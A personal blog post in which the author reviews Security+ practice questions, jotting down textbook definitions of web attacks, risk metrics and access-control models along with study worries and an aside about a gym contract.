Security+…its similar to the last one, pt. 5

Back again with more…questions. Shocking. I know. Anyway, progress is going good. I’m finding that the portion of material I don’t know is about a quarter of it so honestly, that’s really good news as far as lead time to testing. How will the test go? Who knows. I seem to be hitting right on the money lately and eventually if I keep doing that I’m going to fail. I hope I don’t because these test are expensive and I’m going to end up paying a gym a whole bunch of money to get out of a contract on something that they can provide yet offer as a service and refuse to let me out of the contract. Kind of bull shit but you know, I’m just going to keep showing up and making fun of them and explain the situation to the outlandishly cocky people that work there as if I were completely in the wrong and state the facts haha. Which makes it overwhelmingly obvious that they run a bad business or have no idea what they are doing. Regardless they are stealing money from me.

 photo 2_zpsxlhjtpwz.png

This is tough, I have no idea what someone of this coding stuff is and take my best guess. Lets get some definitions going.

  • Cross-site request forgery – an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated
  • Buffer overflow – Attackers generally use buffer overflows to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components.
  • SQL injection – attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system
  • JavaScript data insertion – Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user’s browser.
  • Firewall evasion script – This is possible through NMAP

The thing is some of this stuff I still dont know what the code looks like but I have a basic idea. I think I should be able to recognize SQL but I’m unclear on the JAVA for sure, which happens to be the answer in this case. Am I going to have to completely learn JAVA or is there some basic stuff I can do to get a quick idea about what XSS looks like? I’ll have to do some digging but the info on the OWSAP site for now, ill stick with that and see where it gets me.

 photo 4_zpsdxaztb70.png

The thing I don’t understand about this is, why would I dig the workstation I’m on? Why is the workstation a .com I have so many questions. The workstation isn’t a domain.

 photo 1_zpsxzcc1lal.png

Honestly, I’m unclear on why a web application firewall would do this. There isnt any thing in this that clearly indicates what layer its functioning at and the OWASP site isn’t clear either but I guess I can remember that one. Honestly, with the Network+ there where not many questions from the pretest on the actual test so when you see questions like this and the previous one, your kind of just screwed.

 photo 5_zpsynxqugsy.png

Ok, so here’s the thing. Clearly SHA is the right answer as seen here here but how do I learn about all the other types of certificates and what hashing algorithms they use? No clear answer to that but I can promise you this exact question will not be on the test. Maybe the pretest will go over the rest of them.

 photo 3_zps1bhesbzx.png

I’m not sure what open relay is on an email server, An open relay is a Simple Transfer Mail Protocol (SMTP) server that is improperly configured to allow the unauthenticated relay of email. oh so that shits misconfigured and it just sends mail. Got it.

 photo 4_zpsml9dxiij.png

Why TLS is more important than a CRL is unclear to me. I’m going to look into that. lol I guess I should realize that one as TLS is SSLs replacement. Still, seems like a good idea to use a CRL as well. Just saying.

 photo 2_zpsaerdp9ft.png

I don’t know what 3 of these things are so I’m going to look them up.

  • MTBF – (mean time between failures) is a measure of how reliable a hardware product or component is.
  • ALE – Annualized loss expectancy. Used to measure risk with annualized rate of occurrence (ARO) and single loss expectancy (SLE). The ALE identifies the total amount of loss expected for a given risk. The calculation is SLE x ARO = ALE
  • ARO – annualized rate of occurrence

Lol so ARO is factored into ALE but its not a complete answer.

 photo 3_zpsgn5uhxcw.png

I’m very used to AD terms and this is new terminology to get used to these concepts as they seem to come up again and again so I may have covered this before but I’m going to go through it again.

  • Time based – this one seems obvious in that its a time of day restriction to resources
  • Manditory – mandatory access control refers to a type of access control by which the operating system constrains the ability of a subject or initiator to access or generally perform some sort of operation on an object or target
  • Rule-based – Rules Based Access Control (RBAC), access is allowed or denied to resource objects based on a set of rules defined by a system administrator, I think this is what im used to. How could an OS with no administration perform this task?
  • Discretionary – In computer security, discretionary access control is a type of access control defined by the Trusted Computer System Evaluation Criteria “as a means of restricting access to objects based on the identity of subjects and/or groups to which they belong, isn’t this the same as role-based? They are technically both user based
 photo 1_zpsqmvui2k0.png

To be honest I think that I picked those since they are directly mentioned in the question. I do struggle with these questions however I’m kind of surprised by the MSCHAP answer. ok, lol, according this the answer is the obvious one answer which seems correct.

 photo 5_zpsrswrlvmi.png

This is one is pretty straight forward and the answer could go either way because trojans do by pass authentication to install root kits essentially and then spread themselves. However, to be clear I’m 100% certain on what a RAT is: Remote Access Trojan (RAT) is a type of malware that allows hackers to monitor and control your computer or network lol so…a backdor.

 photo 3_zpsdstw80os.png

A Faraday cage or Faraday shield is an enclosure used to block electromagnetic fields. A Faraday shield may be formed by a continuous covering of conductive material, or in the case of a Faraday cage, by a mesh of such materials

 photo 5_zpsxei7cyzb.png

I dont really know what these terms are

  • MTBF – (mean time between failures) is a measure of how reliable a hardware product or component is. For most components, the measure is typically in thousands or even tens of thousands of hours between failures (we just did this one)
  • MTTR – Mean time to repair
  • RTO – recovery time objective
  • RPO – recovery point objective

I feel like the wording in the question is a little confusing but I understand what they are getting at and agree with it.

 photo 1_zpsiywfcpd0.png

I had gone through about 100 questions this night and I have no idea why I picked that. Client side has nothing to do with executing a sql injection. input validation is what comes into play.

 photo 2_zps64mq8srn.png

The thing is, I don’t have any clue how data deduplication could have any thing to do with this and to be honest I doubt ill find a solid answer. Data deduplication should, in theory be run, and then done with the number of files reduced.

 photo 4_zpspldzvwqs.png

lol SMPT is clearly wrong, FTPS I would have picked, SCP is what I’m confused on secure copy is a command-line utility that allows you to securely copy files and directories between two locations. and ive seen that before lol

All right, well that’s all for now and now to keep going with these pretest questions. 29% of the way through round 1 haha

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: